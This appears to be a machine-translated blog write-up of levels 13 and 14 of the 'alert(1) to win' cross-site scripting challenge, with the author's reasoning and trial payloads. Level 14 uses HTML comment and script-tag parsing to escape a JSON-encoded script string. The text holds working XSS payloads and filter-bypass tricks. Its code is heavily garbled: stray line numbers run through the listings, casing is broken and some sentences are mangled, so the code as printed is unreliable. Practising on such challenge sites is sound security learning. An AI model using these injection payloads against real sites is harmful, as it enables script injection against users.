Question 13th
Topic:
function Escape (s) { var tag = document.createelement (' iframe '); For the-one, you get-to-run any code-want, but a "sandboxed" iframe. //https://4i.am/?... raw= ... just outputs whatever you pass in. //Alerting from 4i.am won ' t count. s = ' <script> ' + S + ' <\/script> '; TAG.SRC = ' https://4i.am/?:XSS=0&CT=text/html&raw= ' + encodeuricomponent (s); Window. WINNING = function () {Youwon = true;}; Tag.setattribute (' onload ', ' Youwon && alert (1) '); return tag.outerhtml;}
Analysis:
The old black did not solve the problem, only know the answer is Name= ' Youwon ', according to the answer on the Internet that each frame has a global object window, and name is the member property of window, the name of the storage windows. The old black guess input name= ' Youwon ' will trigger alert (1), but the experimental URL is not prompted.
Question 14th
Topic:
1 functionEscape (s) {2 functionJSON (s) {returnJson.stringify (s). Replace (/\//g, ' \\/')); }3 functionHTML (s) {returnS.replace (/[<> "&]/g,function(s) {4 return' S.charcodeat ' + (0) + '; '; }); }5 6 return (7' <script> ' +8' var url = ' + JSON (s) + '; We\ ' ll use this later ' +9' </script>\n\n ' +Ten' <!--for debugging-->\n ' + One' URL: ' + HTML (s) + ' \ n ' + A' <!--then suddenly-->\n ' + -' <script>\n ' + -' If (!/^http:.*/.test (URL)) console.log ("Bad URL:" + URL); \ n ' + the' Else new Image (). src = url;\n ' + -' </script> ' - ); -}
Analysis:
Trigger alert (1) where the 11th line is, so construct the payload in <script></script>.
TRY:
First time: "Alert (1);" Failed!
Second time: Check the data, know HTML5 "script data escapedState" feature, use <!--<script>,, can make the parser will be the thing behind this sentence as JS, you can close the 9th line of < /script>, so constructs payload= "alert (1);<!--<script>", the results are shown as follows:
1<script>varurl = "alert (1);<!--<script>";//We ' ll use this later </script>2 3<!-- forDebugging--4Url:alert (1);& #60;! --& #60;script& #62;5 6<!--then suddenly--7<script>8 if(!/^http:.*/.test (URL)) console.log ("Bad URL:" +URL);9 Else NewImage (). src =URL;Ten</script>
The actual code currently in effect is:
1 <script>var url = "alert (1); 2 3 <!--for debugging-4 Url:alert (1); 5 <!--then suddenly -- 6 <script> 7 if (!/^http:.*/.test (URL)) console.log ("Bad URL:" + URL); 8 Else New Image (). src = URL; 9 </script>
But there is still a problem, the 6th line of <script> tags also have a role, and grammar error!
Third time: payload= "alert (1);/*<!--<script>*/if (/a//*", syntax passed, will become like this:
1<script>varurl = "alert (1);\/*<!--<script>*\/if (\/a\/\/*";//We ' ll use this later </script>2 3<!-- forDebugging--4Url:alert (1);/*& #60;! --& #60;script& #62;*/if(/a//*5 6 <!--then suddenly --7 <script>8 if (!/^http:.*/. Test (URL)) console.log ("Bad URL:" +URL);9 Else NewImage (). src =URL;Ten</script>
Remove the invalid code as follows:
1 <script>var url = "alert (1);" 2 3 for debugging-4 url:alert (1); 5 if (/a/.test (URL)) console.log ("Bad URL:" + URL); 6 Else New Image (). src = url; 7 </script>
PS: Above is the old black own understanding, for reference only.
15th, 16, I do not understand the answer, and so on when the knowledge enough, and then conquer these two problems. Online explanation of the link you come over AH
Although this afternoon solved two problems, but also wasted too much time, efficiency is too low, and self-control is not enough, attention is not concentrated, today's performance is not satisfied.
"20171027 in" alert (1) to win 13,14,15,16 question